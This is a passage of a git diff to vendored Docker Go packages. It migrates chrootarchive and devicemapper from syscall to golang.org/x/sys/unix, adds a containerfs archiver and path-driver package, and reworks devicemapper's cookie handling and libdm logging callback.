+			if errCleanup := unix.Unmount(pivotDir, unix.MNT_DETACH); errCleanup != nil {
 				if err == nil {
 					err = errCleanup
 				}
@@ -66,7 +71,7 @@ func chroot(path string) (err error) {
 		}
 	}()
 
-	if err := syscall.PivotRoot(path, pivotDir); err != nil {
+	if err := unix.PivotRoot(path, pivotDir); err != nil {
 		// If pivot fails, fall back to the normal chroot after cleaning up temp dir
 		if err := os.Remove(pivotDir); err != nil {
 			return fmt.Errorf("Error cleaning up after failed pivot: %v", err)
@@ -79,17 +84,17 @@ func chroot(path string) (err error) {
 	// This dir contains the rootfs of the caller, which we need to remove so it is not visible during extraction
 	pivotDir = filepath.Join("/", filepath.Base(pivotDir))
 
-	if err := syscall.Chdir("/"); err != nil {
+	if err := unix.Chdir("/"); err != nil {
 		return fmt.Errorf("Error changing to new root: %v", err)
 	}
 
 	// Make the pivotDir (where the old root lives) private so it can be unmounted without propagating to the host
-	if err := syscall.Mount("", pivotDir, "", syscall.MS_PRIVATE|syscall.MS_REC, ""); err != nil {
+	if err := unix.Mount("", pivotDir, "", unix.MS_PRIVATE|unix.MS_REC, ""); err != nil {
 		return fmt.Errorf("Error making old root private after pivot: %v", err)
 	}
 
 	// Now unmount the old root so it's no longer visible from the new root
-	if err := syscall.Unmount(pivotDir, syscall.MNT_DETACH); err != nil {
+	if err := unix.Unmount(pivotDir, unix.MNT_DETACH); err != nil {
 		return fmt.Errorf("Error while unmounting old root after pivot: %v", err)
 	}
 	mounted = false
@@ -98,10 +103,10 @@ func chroot(path string) (err error) {
 }
 
 func realChroot(path string) error {
-	if err := syscall.Chroot(path); err != nil {
+	if err := unix.Chroot(path); err != nil {
 		return fmt.Errorf("Error after fallback to chroot: %v", err)
 	}
-	if err := syscall.Chdir("/"); err != nil {
+	if err := unix.Chdir("/"); err != nil {
 		return fmt.Errorf("Error changing to new root after chroot: %v", err)
 	}
 	return nil
diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_unix.go b/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_unix.go
index 16354bf648..9a1ee58754 100644
--- a/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_unix.go
+++ b/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_unix.go
@@ -1,12 +1,12 @@
 // +build !windows,!linux
 
-package chrootarchive
+package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive"
 
-import "syscall"
+import "golang.org/x/sys/unix"
 
 func chroot(path string) error {
-	if err := syscall.Chroot(path); err != nil {
+	if err := unix.Chroot(path); err != nil {
 		return err
 	}
-	return syscall.Chdir("/")
+	return unix.Chdir("/")
 }
diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/diff.go b/vendor/github.com/docker/docker/pkg/chrootarchive/diff.go
index 49acad79ff..7712cc17c8 100644
--- a/vendor/github.com/docker/docker/pkg/chrootarchive/diff.go
+++ b/vendor/github.com/docker/docker/pkg/chrootarchive/diff.go
@@ -1,4 +1,4 @@
-package chrootarchive
+package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive"
 
 import (
 	"io"
diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/diff_unix.go b/vendor/github.com/docker/docker/pkg/chrootarchive/diff_unix.go
index eb0aacc3ab..d96a09f8fa 100644
--- a/vendor/github.com/docker/docker/pkg/chrootarchive/diff_unix.go
+++ b/vendor/github.com/docker/docker/pkg/chrootarchive/diff_unix.go
@@ -1,6 +1,6 @@
 //+build !windows
 
-package chrootarchive
+package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive"
 
 import (
 	"bytes"
@@ -29,7 +29,7 @@ type applyLayerResponse struct {
 func applyLayer() {
 
 	var (
-		tmpDir  = ""
+		tmpDir  string
 		err     error
 		options *archive.TarOptions
 	)
diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/diff_windows.go b/vendor/github.com/docker/docker/pkg/chrootarchive/diff_windows.go
index 9dd9988de0..8f3f3a4a8a 100644
--- a/vendor/github.com/docker/docker/pkg/chrootarchive/diff_windows.go
+++ b/vendor/github.com/docker/docker/pkg/chrootarchive/diff_windows.go
@@ -1,4 +1,4 @@
-package chrootarchive
+package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive"
 
 import (
 	"fmt"
@@ -38,7 +38,7 @@ func applyLayerHandler(dest string, layer io.Reader, options *archive.TarOptions
 	s, err := archive.UnpackLayer(dest, layer, nil)
 	os.RemoveAll(tmpDir)
 	if err != nil {
-		return 0, fmt.Errorf("ApplyLayer %s failed UnpackLayer to %s", err, dest)
+		return 0, fmt.Errorf("ApplyLayer %s failed UnpackLayer to %s: %s", layer, dest, err)
 	}
 
 	return s, nil
diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/init_unix.go b/vendor/github.com/docker/docker/pkg/chrootarchive/init_unix.go
index 4f637f17b8..a15e4bb83c 100644
--- a/vendor/github.com/docker/docker/pkg/chrootarchive/init_unix.go
+++ b/vendor/github.com/docker/docker/pkg/chrootarchive/init_unix.go
@@ -1,6 +1,6 @@
 // +build !windows
 
-package chrootarchive
+package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive"
 
 import (
 	"fmt"
diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/init_windows.go b/vendor/github.com/docker/docker/pkg/chrootarchive/init_windows.go
index fa17c9bf83..15ed874e77 100644
--- a/vendor/github.com/docker/docker/pkg/chrootarchive/init_windows.go
+++ b/vendor/github.com/docker/docker/pkg/chrootarchive/init_windows.go
@@ -1,4 +1,4 @@
-package chrootarchive
+package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive"
 
 func init() {
 }
diff --git a/vendor/github.com/docker/docker/pkg/containerfs/archiver.go b/vendor/github.com/docker/docker/pkg/containerfs/archiver.go
new file mode 100644
index 0000000000..1fb7ff7bdc
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/containerfs/archiver.go
@@ -0,0 +1,203 @@
+package containerfs // import "github.com/docker/docker/pkg/containerfs"
+
+import (
+	"archive/tar"
+	"fmt"
+	"io"
+	"os"
+	"path/filepath"
+	"time"
+
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/system"
+	"github.com/sirupsen/logrus"
+)
+
+// TarFunc provides a function definition for a custom Tar function
+type TarFunc func(string, *archive.TarOptions) (io.ReadCloser, error)
+
+// UntarFunc provides a function definition for a custom Untar function
+type UntarFunc func(io.Reader, string, *archive.TarOptions) error
+
+// Archiver provides a similar implementation of the archive.Archiver package with the rootfs abstraction
+type Archiver struct {
+	SrcDriver     Driver
+	DstDriver     Driver
+	Tar           TarFunc
+	Untar         UntarFunc
+	IDMappingsVar *idtools.IDMappings
+}
+
+// TarUntar is a convenience function which calls Tar and Untar, with the output of one piped into the other.
+// If either Tar or Untar fails, TarUntar aborts and returns the error.
+func (archiver *Archiver) TarUntar(src, dst string) error {
+	logrus.Debugf("TarUntar(%s %s)", src, dst)
+	tarArchive, err := archiver.Tar(src, &archive.TarOptions{Compression: archive.Uncompressed})
+	if err != nil {
+		return err
+	}
+	defer tarArchive.Close()
+	options := &archive.TarOptions{
+		UIDMaps: archiver.IDMappingsVar.UIDs(),
+		GIDMaps: archiver.IDMappingsVar.GIDs(),
+	}
+	return archiver.Untar(tarArchive, dst, options)
+}
+
+// UntarPath untar a file from path to a destination, src is the source tar file path.
+func (archiver *Archiver) UntarPath(src, dst string) error {
+	tarArchive, err := archiver.SrcDriver.Open(src)
+	if err != nil {
+		return err
+	}
+	defer tarArchive.Close()
+	options := &archive.TarOptions{
+		UIDMaps: archiver.IDMappingsVar.UIDs(),
+		GIDMaps: archiver.IDMappingsVar.GIDs(),
+	}
+	return archiver.Untar(tarArchive, dst, options)
+}
+
+// CopyWithTar creates a tar archive of filesystem path `src`, and
+// unpacks it at filesystem path `dst`.
+// The archive is streamed directly with fixed buffering and no
+// intermediary disk IO.
+func (archiver *Archiver) CopyWithTar(src, dst string) error {
+	srcSt, err := archiver.SrcDriver.Stat(src)
+	if err != nil {
+		return err
+	}
+	if !srcSt.IsDir() {
+		return archiver.CopyFileWithTar(src, dst)
+	}
+
+	// if this archiver is set up with ID mapping we need to create
+	// the new destination directory with the remapped root UID/GID pair
+	// as owner
+	rootIDs := archiver.IDMappingsVar.RootPair()
+	// Create dst, copy src's content into it
+	if err := idtools.MkdirAllAndChownNew(dst, 0755, rootIDs); err != nil {
+		return err
+	}
+	logrus.Debugf("Calling TarUntar(%s, %s)", src, dst)
+	return archiver.TarUntar(src, dst)
+}
+
+// CopyFileWithTar emulates the behavior of the 'cp' command-line
+// for a single file. It copies a regular file from path `src` to
+// path `dst`, and preserves all its metadata.
+func (archiver *Archiver) CopyFileWithTar(src, dst string) (err error) {
+	logrus.Debugf("CopyFileWithTar(%s, %s)", src, dst)
+	srcDriver := archiver.SrcDriver
+	dstDriver := archiver.DstDriver
+
+	srcSt, err := srcDriver.Stat(src)
+	if err != nil {
+		return err
+	}
+
+	if srcSt.IsDir() {
+		return fmt.Errorf("Can't copy a directory")
+	}
+
+	// Clean up the trailing slash. This must be done in an operating
+	// system specific manner.
+	if dst[len(dst)-1] == dstDriver.Separator() {
+		dst = dstDriver.Join(dst, srcDriver.Base(src))
+	}
+
+	// The original call was system.MkdirAll, which is just
+	// os.MkdirAll on not-Windows and changed for Windows.
+	if dstDriver.OS() == "windows" {
+		// Now we are WCOW
+		if err := system.MkdirAll(filepath.Dir(dst), 0700, ""); err != nil {
+			return err
+		}
+	} else {
+		// We can just use the driver.MkdirAll function
+		if err := dstDriver.MkdirAll(dstDriver.Dir(dst), 0700); err != nil {
+			return err
+		}
+	}
+
+	r, w := io.Pipe()
+	errC := make(chan error, 1)
+
+	go func() {
+		defer close(errC)
+		errC <- func() error {
+			defer w.Close()
+
+			srcF, err := srcDriver.Open(src)
+			if err != nil {
+				return err
+			}
+			defer srcF.Close()
+
+			hdr, err := tar.FileInfoHeader(srcSt, "")
+			if err != nil {
+				return err
+			}
+			hdr.Format = tar.FormatPAX
+			hdr.ModTime = hdr.ModTime.Truncate(time.Second)
+			hdr.AccessTime = time.Time{}
+			hdr.ChangeTime = time.Time{}
+			hdr.Name = dstDriver.Base(dst)
+			if dstDriver.OS() == "windows" {
+				hdr.Mode = int64(chmodTarEntry(os.FileMode(hdr.Mode)))
+			} else {
+				hdr.Mode = int64(os.FileMode(hdr.Mode))
+			}
+
+			if err := remapIDs(archiver.IDMappingsVar, hdr); err != nil {
+				return err
+			}
+
+			tw := tar.NewWriter(w)
+			defer tw.Close()
+			if err := tw.WriteHeader(hdr); err != nil {
+				return err
+			}
+			if _, err := io.Copy(tw, srcF); err != nil {
+				return err
+			}
+			return nil
+		}()
+	}()
+	defer func() {
+		if er := <-errC; err == nil && er != nil {
+			err = er
+		}
+	}()
+
+	err = archiver.Untar(r, dstDriver.Dir(dst), nil)
+	if err != nil {
+		r.CloseWithError(err)
+	}
+	return err
+}
+
+// IDMappings returns the IDMappings of the archiver.
+func (archiver *Archiver) IDMappings() *idtools.IDMappings {
+	return archiver.IDMappingsVar
+}
+
+func remapIDs(idMappings *idtools.IDMappings, hdr *tar.Header) error {
+	ids, err := idMappings.ToHost(idtools.IDPair{UID: hdr.Uid, GID: hdr.Gid})
+	hdr.Uid, hdr.Gid = ids.UID, ids.GID
+	return err
+}
+
+// chmodTarEntry is used to adjust the file permissions used in tar header based
+// on the platform the archival is done.
+func chmodTarEntry(perm os.FileMode) os.FileMode {
+	//perm &= 0755 // this 0-ed out tar flags (like link, regular file, directory marker etc.)
+	permPart := perm & os.ModePerm
+	noPermPart := perm &^ os.ModePerm
+	// Add the x bit: make everything +x from windows
+	permPart |= 0111
+	permPart &= 0755
+
+	return noPermPart | permPart
+}
diff --git a/vendor/github.com/docker/docker/pkg/containerfs/containerfs.go b/vendor/github.com/docker/docker/pkg/containerfs/containerfs.go
new file mode 100644
index 0000000000..7bb1d8c369
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/containerfs/containerfs.go
@@ -0,0 +1,87 @@
+package containerfs // import "github.com/docker/docker/pkg/containerfs"
+
+import (
+	"path/filepath"
+	"runtime"
+
+	"github.com/containerd/continuity/driver"
+	"github.com/containerd/continuity/pathdriver"
+	"github.com/docker/docker/pkg/symlink"
+)
+
+// ContainerFS is that represents a root file system
+type ContainerFS interface {
+	// Path returns the path to the root. Note that this may not exist
+	// on the local system, so the continuity operations must be used
+	Path() string
+
+	// ResolveScopedPath evaluates the given path scoped to the root.
+	// For example, if root=/a, and path=/b/c, then this function would return /a/b/c.
+	// If rawPath is true, then the function will not preform any modifications
+	// before path resolution. Otherwise, the function will clean the given path
+	// by making it an absolute path.
+	ResolveScopedPath(path string, rawPath bool) (string, error)
+
+	Driver
+}
+
+// Driver combines both continuity's Driver and PathDriver interfaces with a Platform
+// field to determine the OS.
+type Driver interface {
+	// OS returns the OS where the rootfs is located. Essentially,
+	// runtime.GOOS for everything aside from LCOW, which is "linux"
+	OS() string
+
+	// Architecture returns the hardware architecture where the
+	// container is located.
+	Architecture() string
+
+	// Driver & PathDriver provide methods to manipulate files & paths
+	driver.Driver
+	pathdriver.PathDriver
+}
+
+// NewLocalContainerFS is a helper function to implement daemon's Mount interface
+// when the graphdriver mount point is a local path on the machine.
+func NewLocalContainerFS(path string) ContainerFS {
+	return &local{
+		path:       path,
+		Driver:     driver.LocalDriver,
+		PathDriver: pathdriver.LocalPathDriver,
+	}
+}
+
+// NewLocalDriver provides file and path drivers for a local file system. They are
+// essentially a wrapper around the `os` and `filepath` functions.
+func NewLocalDriver() Driver {
+	return &local{
+		Driver:     driver.LocalDriver,
+		PathDriver: pathdriver.LocalPathDriver,
+	}
+}
+
+type local struct {
+	path string
+	driver.Driver
+	pathdriver.PathDriver
+}
+
+func (l *local) Path() string {
+	return l.path
+}
+
+func (l *local) ResolveScopedPath(path string, rawPath bool) (string, error) {
+	cleanedPath := path
+	if !rawPath {
+		cleanedPath = cleanScopedPath(path)
+	}
+	return symlink.FollowSymlinkInScope(filepath.Join(l.path, cleanedPath), l.path)
+}
+
+func (l *local) OS() string {
+	return runtime.GOOS
+}
+
+func (l *local) Architecture() string {
+	return runtime.GOARCH
+}
diff --git a/vendor/github.com/docker/docker/pkg/containerfs/containerfs_unix.go b/vendor/github.com/docker/docker/pkg/containerfs/containerfs_unix.go
new file mode 100644
index 0000000000..6a99459517
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/containerfs/containerfs_unix.go
@@ -0,0 +1,10 @@
+// +build !windows
+
+package containerfs // import "github.com/docker/docker/pkg/containerfs"
+
+import "path/filepath"
+
+// cleanScopedPath preappends a to combine with a mnt path.
+func cleanScopedPath(path string) string {
+	return filepath.Join(string(filepath.Separator), path)
+}
diff --git a/vendor/github.com/docker/docker/pkg/containerfs/containerfs_windows.go b/vendor/github.com/docker/docker/pkg/containerfs/containerfs_windows.go
new file mode 100644
index 0000000000..9fb7084628
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/containerfs/containerfs_windows.go
@@ -0,0 +1,15 @@
+package containerfs // import "github.com/docker/docker/pkg/containerfs"
+
+import "path/filepath"
+
+// cleanScopedPath removes the C:\ syntax, and prepares to combine
+// with a volume path
+func cleanScopedPath(path string) string {
+	if len(path) >= 2 {
+		c := path[0]
+		if path[1] == ':' && ('a' <= c && c <= 'z' || 'A' <= c && c <= 'Z') {
+			path = path[2:]
+		}
+	}
+	return filepath.Join(string(filepath.Separator), path)
+}
diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper.go
index 94b55306f1..63243637a7 100644
--- a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper.go
+++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper.go
@@ -1,23 +1,20 @@
-// +build linux
+// +build linux,cgo
 
-package devicemapper
+package devicemapper // import "github.com/docker/docker/pkg/devicemapper"
 
 import (
 	"errors"
 	"fmt"
 	"os"
 	"runtime"
-	"syscall"
 	"unsafe"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/sirupsen/logrus"
+	"golang.org/x/sys/unix"
 )
 
-// DevmapperLogger defines methods for logging with devicemapper.
-type DevmapperLogger interface {
-	DMLog(level int, file string, line int, dmError int, message string)
-}
-
+// Same as DM_DEVICE_* enum values from libdevmapper.h
+// nolint: deadcode
 const (
 	deviceCreate TaskType = iota
 	deviceReload
@@ -70,12 +67,14 @@ var (
 	ErrBusy                 = errors.New("Device is Busy")
 	ErrDeviceIDExists       = errors.New("Device Id Exists")
 	ErrEnxio                = errors.New("No such device or address")
+	ErrEnoData              = errors.New("No data available")
 )
 
 var (
-	dmSawBusy  bool
-	dmSawExist bool
-	dmSawEnxio bool // No Such Device or Address
+	dmSawBusy    bool
+	dmSawExist   bool
+	dmSawEnxio   bool // No Such Device or Address
+	dmSawEnoData bool // No data available
 )
 
 type (
@@ -155,6 +154,7 @@ func (t *Task) run() error {
 	if res := DmTaskRun(t.unmanaged); res != 1 {
 		return ErrTaskRun
 	}
+	runtime.KeepAlive(t)
 	return nil
 }
 
@@ -257,25 +257,12 @@ func (t *Task) getNextTarget(next unsafe.Pointer) (nextPtr unsafe.Pointer, start
 // UdevWait waits for any processes that are waiting for udev to complete the specified cookie.
 func UdevWait(cookie *uint) error {
 	if res := DmUdevWait(*cookie); res != 1 {
-		logrus.Debugf("devicemapper: Failed to wait on udev cookie %d", *cookie)
+		logrus.Debugf("devicemapper: Failed to wait on udev cookie %d, %d", *cookie, res)
 		return ErrUdevWait
 	}
 	return nil
 }
 
-// LogInitVerbose is an interface to initialize the verbose logger for the device mapper library.
-func LogInitVerbose(level int) {
-	DmLogInitVerbose(level)
-}
-
-var dmLogger DevmapperLogger
-
-// LogInit initializes the logger for the device mapper library.
-func LogInit(logger DevmapperLogger) {
-	dmLogger = logger
-	LogWithErrnoInit()
-}
-
 // SetDevDir sets the dev folder for the device mapper library (usually /dev).
 func SetDevDir(dir string) error {
 	if res := DmSetDevDir(dir); res != 1 {
@@ -328,17 +315,21 @@ func RemoveDevice(name string) error {
 		return err
 	}
 
-	var cookie uint
-	if err := task.setCookie(&cookie, 0); err != nil {
+	cookie := new(uint)
+	if err := task.setCookie(cookie, 0); err != nil {
 		return fmt.Errorf("devicemapper: Can not set cookie: %s", err)
 	}
-	defer UdevWait(&cookie)
+	defer UdevWait(cookie)
 
 	dmSawBusy = false // reset before the task is run
+	dmSawEnxio = false
 	if err = task.run(); err != nil {
 		if dmSawBusy {
 			return ErrBusy
 		}
+		if dmSawEnxio {
+			return ErrEnxio
+		}
 		return fmt.Errorf("devicemapper: Error running RemoveDevice %s", err)
 	}
 
@@ -361,10 +352,9 @@ func RemoveDeviceDeferred(name string) error {
 	// set a task cookie and disable library fallback, or else libdevmapper will
 	// disable udev dm rules and delete the symlink under /dev/mapper by itself,
 	// even if the removal is deferred by the kernel.
-	var cookie uint
-	var flags uint16
-	flags = DmUdevDisableLibraryFallback
-	if err := task.setCookie(&cookie, flags); err != nil {
+	cookie := new(uint)
+	flags := uint16(DmUdevDisableLibraryFallback)
+	if err := task.setCookie(cookie, flags); err != nil {
 		return fmt.Errorf("devicemapper: Can not set cookie: %s", err)
 	}
 
@@ -372,14 +362,18 @@ func RemoveDeviceDeferred(name string) error {
 	// semaphores created in `task.setCookie` will be cleaned up in `UdevWait`.
 	// So these two function call must come in pairs, otherwise semaphores will
 	// be leaked, and the  limit of number of semaphores defined in `/proc/sys/kernel/sem`
-	// will be reached, which will eventually make all follwing calls to 'task.SetCookie'
+	// will be reached, which will eventually make all following calls to 'task.SetCookie'
 	// fail.
 	// this call will not wait for the deferred removal's final executing, since no
 	// udev event will be generated, and the semaphore's value will not be incremented
 	// by udev, what UdevWait is just cleaning up the semaphore.
-	defer UdevWait(&cookie)
+	defer UdevWait(cookie)
 
+	dmSawEnxio = false
 	if err = task.run(); err != nil {
+		if dmSawEnxio {
+			return ErrEnxio
+		}
 		return fmt.Errorf("devicemapper: Error running RemoveDeviceDeferred %s", err)
 	}
 
@@ -448,7 +442,7 @@ func BlockDeviceDiscard(path string) error {
 
 	// Without this sometimes the remove of the device that happens after
 	// discard fails with EBUSY.
-	syscall.Sync()
+	unix.Sync()
 
 	return nil
 }
@@ -471,13 +465,12 @@ func CreatePool(poolName string, dataFile, metadataFile *os.File, poolBlockSize
 		return fmt.Errorf("devicemapper: Can't add target %s", err)
 	}
 
-	var cookie uint
-	var flags uint16
-	flags = DmUdevDisableSubsystemRulesFlag | DmUdevDisableDiskRulesFlag | DmUdevDisableOtherRulesFlag
-	if err := task.setCookie(&cookie, flags); err != nil {
+	cookie := new(uint)
+	flags := uint16(DmUdevDisableSubsystemRulesFlag | DmUdevDisableDiskRulesFlag | DmUdevDisableOtherRulesFlag)
+	if err := task.setCookie(cookie, flags); err != nil {
 		return fmt.Errorf("devicemapper: Can't set cookie %s", err)
 	}
-	defer UdevWait(&cookie)
+	defer UdevWait(cookie)
 
 	if err := task.run(); err != nil {
 		return fmt.Errorf("devicemapper: Error running deviceCreate (CreatePool) %s", err)
@@ -505,7 +498,7 @@ func ReloadPool(poolName string, dataFile, metadataFile *os.File, poolBlockSize
 	}
 
 	if err := task.run(); err != nil {
-		return fmt.Errorf("devicemapper: Error running deviceCreate %s", err)
+		return fmt.Errorf("devicemapper: Error running ReloadPool %s", err)
 	}
 
 	return nil
@@ -659,11 +652,11 @@ func ResumeDevice(name string) error {
 		return err
 	}
 
-	var cookie uint
-	if err := task.setCookie(&cookie, 0); err != nil {
+	cookie := new(uint)
+	if err := task.setCookie(cookie, 0); err != nil {
 		return fmt.Errorf("devicemapper: Can't set cookie %s", err)
 	}
-	defer UdevWait(&cookie)
+	defer UdevWait(cookie)
 
 	if err := task.run(); err != nil {
 		return fmt.Errorf("devicemapper: Error running deviceResume %s", err)
@@ -717,10 +710,15 @@ func DeleteDevice(poolName string, deviceID int) error {
 	}
 
 	dmSawBusy = false
+	dmSawEnoData = false
 	if err := task.run(); err != nil {
 		if dmSawBusy {
 			return ErrBusy
 		}
+		if dmSawEnoData {
+			logrus.Debugf("devicemapper: Device(id: %d) from pool(%s) does not exist", deviceID, poolName)
+			return nil
+		}
 		return fmt.Errorf("devicemapper: Error running DeleteDevice %s", err)
 	}
 	return nil
@@ -757,12 +755,12 @@ func activateDevice(poolName string, name string, deviceID int, size uint64, ext
 		return fmt.Errorf("devicemapper: Can't add node %s", err)
 	}
 
-	var cookie uint
-	if err := task.setCookie(&cookie, 0); err != nil {
+	cookie := new(uint)
+	if err := task.setCookie(cookie, 0); err != nil {
 		return fmt.Errorf("devicemapper: Can't set cookie %s", err)
 	}
 
-	defer UdevWait(&cookie)
+	defer UdevWait(cookie)
 
 	if err := task.run(); err != nil {
 		return fmt.Errorf("devicemapper: Error running deviceCreate (ActivateDevice) %s", err)
@@ -792,7 +790,7 @@ func CreateSnapDeviceRaw(poolName string, deviceID int, baseDeviceID int) error
 		if dmSawExist {
 			return ErrDeviceIDExists
 		}
-		return fmt.Errorf("devicemapper: Error running deviceCreate (createSnapDevice) %s", err)
+		return fmt.Errorf("devicemapper: Error running deviceCreate (CreateSnapDeviceRaw) %s", err)
 	}
 
 	return nil
diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_log.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_log.go
index 8477e36fec..5a5773d44f 100644
--- a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_log.go
+++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_log.go
@@ -1,21 +1,49 @@
-// +build linux
+// +build linux,cgo
 
-package devicemapper
+package devicemapper // import "github.com/docker/docker/pkg/devicemapper"
 
 import "C"
 
 import (
+	"fmt"
 	"strings"
+
+	"github.com/sirupsen/logrus"
 )
 
+// DevmapperLogger defines methods required to register as a callback for
+// logging events received from devicemapper. Note that devicemapper will send
+// *all* logs regardless to callbacks (including debug logs) so it's
+// recommended to not spam the console with the outputs.
+type DevmapperLogger interface {
+	// DMLog is the logging callback containing all of the information from
+	// devicemapper. The interface is identical to the C libdm counterpart.
+	DMLog(level int, file string, line int, dmError int, message string)
+}
+
+// dmLogger is the current logger in use that is being forwarded our messages.
+var dmLogger DevmapperLogger
+
+// LogInit changes the logging callback called after processing libdm logs for
+// error message information. The default logger simply forwards all logs to
+// logrus. Calling LogInit(nil) disables the calling of callbacks.
+func LogInit(logger DevmapperLogger) {
+	dmLogger = logger
+}
+
 // Due to the way cgo works this has to be in a separate file, as devmapper.go has
 // definitions in the cgo block, which is incompatible with using "//export"
 
-// DevmapperLogCallback exports the devmapper log callback for cgo.
+// DevmapperLogCallback exports the devmapper log callback for cgo. Note that
+// because we are using callbacks, this function will be called for *every* log
+// in libdm (even debug ones because there's no way of setting the verbosity
+// level for an external logging callback).
 //export DevmapperLogCallback
-func DevmapperLogCallback(level C.int, file *C.char, line C.int, dmErrnoOrClass C.int, message *C.char) {
+func DevmapperLogCallback(level C.int, file *C.char, line, dmErrnoOrClass C.int, message *C.char) {
 	msg := C.GoString(message)
-	if level < 7 {
+
+	// Track what errno libdm saw, because the library only gives us 0 or 1.
+	if level < LogLevelDebug {
 		if strings.Contains(msg, "busy") {
 			dmSawBusy = true
 		}
@@ -27,9 +55,70 @@ func DevmapperLogCallback(level C.int, file *C.char, line C.int, dmErrnoOrClass
 		if strings.Contains(msg, "No such device or address") {
 			dmSawEnxio = true
 		}
+		if strings.Contains(msg, "No data available") {
+			dmSawEnoData = true
+		}
 	}
 
 	if dmLogger != nil {
 		dmLogger.DMLog(int(level), C.GoString(file), int(line), int(dmErrnoOrClass), msg)
 	}
 }
+
+// DefaultLogger is the default logger used by pkg/devicemapper. It forwards
+// all logs that are of higher or equal priority to the given level to the
+// corresponding logrus level.
+type DefaultLogger struct {
+	// Level corresponds to the highest libdm level that will be forwarded to
+	// logrus. In order to change this, register a new DefaultLogger.
+	Level int
+}
+
+// DMLog is the logging callback containing all of the information from
+// devicemapper. The interface is identical to the C libdm counterpart.
+func (l DefaultLogger) DMLog(level int, file string, line, dmError int, message string) {
+	if level <= l.Level {
+		// Forward the log to the correct logrus level, if allowed by dmLogLevel.
+		logMsg := fmt.Sprintf("libdevmapper(%d): %s:%d (%d) %s", level, file, line, dmError, message)
+		switch level {
+		case LogLevelFatal, LogLevelErr:
+			logrus.Error(logMsg)
+		case LogLevelWarn:
+			logrus.Warn(logMsg)
+		case LogLevelNotice, LogLevelInfo:
+			logrus.Info(logMsg)
+		case LogLevelDebug:
+			logrus.Debug(logMsg)
+		default:
+			// Don't drop any "unknown" levels.
+			logrus.Info(logMsg)
+		}
+	}
+}
+
+// registerLogCallback registers our own logging callback function for libdm
+// (which is DevmapperLogCallback).
+//
+// Because libdm only gives us {0,1} error codes we need to parse the logs
+// produced by libdm (to set dmSawBusy and so on). Note that by registering a
+// callback using DevmapperLogCallback, libdm will no longer output logs to
+// stderr so we have to log everything ourselves. None of this handling is
+// optional because we depend on log callbacks to parse the logs, and if we
+// don't forward the log information we'll be in a lot of trouble when
+// debugging things.
+func registerLogCallback() {
+	LogWithErrnoInit()
+}
+
+func init() {
+	// Use the default logger by default. We only allow LogLevelFatal by
+	// default, because internally we mask a lot of libdm errors by retrying
+	// and similar tricks. Also, libdm is very chatty and we don't want to
+	// worry users for no reason.
+	dmLogger = DefaultLogger{
+		Level: LogLevelFatal,
+	}
+
+	// Register as early as possible so we don't miss anything.
+	registerLogCallback()
+}
diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper.go
index 91fbc85b3a..0b88f49695 100644
--- a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper.go
+++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper.go
@@ -1,9 +1,9 @@
-// +build linux
+// +build linux,cgo
 
-package devicemapper
+package devicemapper // import "github.com/docker/docker/pkg/devicemapper"
 
 /*
-#cgo LDFLAGS: -L. -ldevmapper
+#define _GNU_SOURCE
 #include <libdevmapper.h>
 #include <linux/fs.h>   // FIXME: present only for BLKGETSIZE64, maybe we can remove it?
 
@@ -12,19 +12,25 @@ extern void DevmapperLogCallback(int level, char *file, int line, int dm_errno_o
 
 static void	log_cb(int level, const char *file, int line, int dm_errno_or_class, const char *f, ...)
 {
-  char buffer[256];
-  va_list ap;
-
-  va_start(ap, f);
-  vsnprintf(buffer, 256, f, ap);
-  va_end(ap);
+	char *buffer = NULL;
+	va_list ap;
+	int ret;
+
+	va_start(ap, f);
+	ret = vasprintf(&buffer, f, ap);
+	va_end(ap);
+	if (ret < 0) {
+		// memory allocation failed -- should never happen?
+		return;
+	}
 
-  DevmapperLogCallback(level, (char *)file, line, dm_errno_or_class, buffer);
+	DevmapperLogCallback(level, (char *)file, line, dm_errno_or_class, buffer);
+	free(buffer);
 }
 
 static void	log_with_errno_init()
 {
-  dm_log_with_errno_init(log_cb);
+	dm_log_with_errno_init(log_cb);
 }
 */
 import "C"
@@ -56,7 +62,6 @@ const (
 var (
 	DmGetLibraryVersion       = dmGetLibraryVersionFct
 	DmGetNextTarget           = dmGetNextTargetFct
-	DmLogInitVerbose          = dmLogInitVerboseFct
 	DmSetDevDir               = dmSetDevDirFct
 	DmTaskAddTarget           = dmTaskAddTargetFct
 	DmTaskCreate              = dmTaskCreateFct
@@ -211,7 +216,7 @@ func dmGetNextTargetFct(task *cdmTask, next unsafe.Pointer, start, length *uint6
 }
 
 func dmUdevSetSyncSupportFct(syncWithUdev int) {
-	(C.dm_udev_set_sync_support(C.int(syncWithUdev)))
+	C.dm_udev_set_sync_support(C.int(syncWithUdev))
 }
 
